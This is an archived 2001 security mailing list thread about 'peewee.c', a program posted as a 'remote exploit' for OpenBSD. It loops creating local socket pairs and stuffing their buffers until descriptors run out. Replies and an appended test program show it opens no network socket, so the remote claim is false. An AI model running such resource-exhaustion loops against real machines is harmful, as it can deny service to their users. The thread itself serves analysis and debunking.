Vulnerability Development mailing list archives

Re: proof of exploited code


From: Brad Doctor <bdoctor () ps-ax com>
Date: Wed, 06 Jun 2001 21:16:34 -0600

Unless this is part of something larger, its current form is entirely bogus. _UNIX is a UNIX domain socket. There is no "remote" exploit here. I think the individual is upset about something. Nothing like publicly making an .. well, you know. "man socket" and search for AF_UNIX if you are curious.

-brad


At 02:03 PM 6/6/2001 -0400, max wrote:
The code doesn't do anything. I ran it on an obsd 2.8 machine and the state
of the machine after execution was the same as before. From what I understand
from this code, it simply opens up 2 local (PF_UNIX) sockets and writes
some garbage to both of them. The socket option calls change receive and
send buffers on the socket, which I guess has something to do with the
size of the garbage we send to the local sockets. The fcntl call sets the non-block
flag on the sockets (I'm not sure I understand what this is, and the
man pages are rather concise on this, but I guess it makes it a non-block
device?), and then two write calls, where the crap gets written into the
sockets.
Now, I am by no means an expert or even an experienced programmer, and
this analysis is my attempt to understand unix programming better, so
please, all flames are welcome. I'm posting this just to see if my
assumptions are correct, not to actually give a guru-level analysis. (So if
this isn't posted, I'll live.)

thanks for letting me waste everyone's time : )

max

>
> Fsck Theo Dumbraadt wrote:
> >
> > This code shows a remote exploit for OpenBSD versions 2.8 and 2.9
> > and can now be released to the public to break Theo's "4 years without
> > remote exploits" saying. I wrote it while people told me it could not
> > happen on the list, so here is your proof, bitch.
> >
> > //
> > // peewee.c
> > // peewee herman proof of concept; this code will show all of the
> > // world how vulnerable OpenBSD is and how Theo Dumbraadt is
> > // not more than a liar. copyraadt 2001 by Jigglypuff
> > // http://home.online.no/~wiighome/ninasiden/Jigglypuff.jpg
> > // this proggie is GPL licensed; to those who use it, keep my
> > // credits and don't be a lamer
> > //
> > #include        <sys/types.h>   /* required before <sys/socket.h> on older BSDs */
> > #include        <unistd.h>
> > #include        <sys/socket.h>
> > #include        <fcntl.h>
> >
> > #define         BUFFERSIZE      409600
> >
> > int
> > main(void)
> > {
> >         int             p[2], i;
> >         char            crap[BUFFERSIZE];   /* never initialised: whatever is on the stack gets written */
> >
> >         /* keep creating local (AF_UNIX) socket pairs until the kernel refuses, */
> >         /* i.e. until the process runs out of file descriptors */
> >         while (1)
> >         {
> >                 if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
> >                         break;
> >                 /* ask for 400 KB send/receive buffers on both ends; the kernel may clamp this */
> >                 i = BUFFERSIZE;
> >                 setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
> >                 setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
> >                 setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
> >                 setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
> >                 /* non-blocking: write() returns a short count or EAGAIN instead of sleeping */
> >                 fcntl(p[0], F_SETFL, O_NONBLOCK);
> >                 fcntl(p[1], F_SETFL, O_NONBLOCK);
> >                 /* push the buffer into each end; return values are ignored and the */
> >                 /* data never leaves this process's own socket pair */
> >                 write(p[0], crap, BUFFERSIZE);
> >                 write(p[1], crap, BUFFERSIZE);
> >         }
> >         return(0);
> > }
> >
> > * Get your free email at http://www.inbox.net
>
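Brad's point about AF_UNIX, checked in code. The program below is an added example written for this archive page; it is not code from the thread and not Jigglypuff's. It performs one iteration of what peewee.c does on a single socketpair, then reports what the kernel actually saw: getsockname() shows an unnamed AF_UNIX socket (no path, no port, nothing a remote host could connect to), the SO_SNDBUF granted is whatever the kernel clamps the 400 KB request to (Linux doubles the value and caps it at net.core.wmem_max), the non-blocking write() accepts only what fits, and every byte it accepted can be read straight back out of the peer descriptor in the same process. The struct and function names (pair_probe, probe_local_pair) are my own; BUFFERSIZE is the value from the posted program.

```c
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <errno.h>
#include <fcntl.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BUFFERSIZE 409600   /* same size peewee.c writes */

/* What one iteration of peewee.c actually does, measured. (Added example; names are my own.) */
struct pair_probe {
    int ok;            /* 1 if every call succeeded */
    int family;        /* address family getsockname() reports for p[0] */
    int unnamed;       /* 1 if that address has no filesystem path: nothing to connect to */
    int sndbuf;        /* SO_SNDBUF the kernel actually granted after asking for BUFFERSIZE */
    long written;      /* bytes the non-blocking write() accepted */
    long drained;      /* bytes read back out of the peer end, in this same process */
};

struct pair_probe probe_local_pair(void)
{
    static char crap[BUFFERSIZE];   /* static: zero-filled, and keeps 400 KB off the stack */
    static char sink[BUFFERSIZE];
    struct pair_probe r;
    struct sockaddr_un sun;
    socklen_t len;
    int p[2], want = BUFFERSIZE, got = 0;
    ssize_t n;

    memset(&r, 0, sizeof r);
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
        return r;

    /* A socketpair() socket is unnamed: no sun_path, no port, no way in from the network. */
    memset(&sun, 0, sizeof sun);
    len = sizeof sun;
    if (getsockname(p[0], (struct sockaddr *)&sun, &len) == -1)
        goto out;
    r.family = sun.sun_family;
    r.unnamed = (len <= offsetof(struct sockaddr_un, sun_path) || sun.sun_path[0] == '\0');

    /* Ask for the 400 KB buffer peewee.c asks for, then read back what the kernel granted. */
    setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &want, sizeof want);
    len = sizeof got;
    if (getsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &got, &len) == -1)
        goto out;
    r.sndbuf = got;

    /* Non-blocking, exactly as in peewee.c: write() returns a short count or EAGAIN, never sleeps. */
    if (fcntl(p[0], F_SETFL, O_NONBLOCK) == -1 || fcntl(p[1], F_SETFL, O_NONBLOCK) == -1)
        goto out;
    n = write(p[0], crap, BUFFERSIZE);
    if (n == -1) {
        if (errno != EAGAIN && errno != EWOULDBLOCK)
            goto out;
        n = 0;                  /* buffer already full: nothing accepted */
    }
    r.written = (long)n;

    /* Everything accepted now sits in p[1]'s receive queue, owned by this process; drain it. */
    for (;;) {
        n = read(p[1], sink, sizeof sink);
        if (n > 0) {
            r.drained += (long)n;
            continue;
        }
        if (n == -1 && (errno == EAGAIN || errno == EWOULDBLOCK))
            break;              /* queue empty: we got back exactly what went in */
        goto out;               /* EOF or a real error; cannot happen while p[0] is open */
    }
    r.ok = 1;
out:
    close(p[0]);
    close(p[1]);
    return r;
}

int main(void)
{
    struct pair_probe r = probe_local_pair();
    printf("ok=%d family=%s unnamed=%d sndbuf=%d written=%ld drained=%ld\n",
           r.ok, r.family == AF_UNIX ? "AF_UNIX" : "other", r.unnamed, r.sndbuf,
           r.written, r.drained);
    return r.ok ? 0 : 1;
}
```

Build with `cc -Wall -o pair_probe pair_probe.c` and run it unprivileged. The two numbers to look at are `unnamed=1` (there is no endpoint outside the process) and `drained` equal to `written` (the "garbage" went from one end of the pair to the other and nowhere else). The exact `sndbuf` and `written` values vary by kernel and sysctl settings; what does not vary is that no network socket is ever opened.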

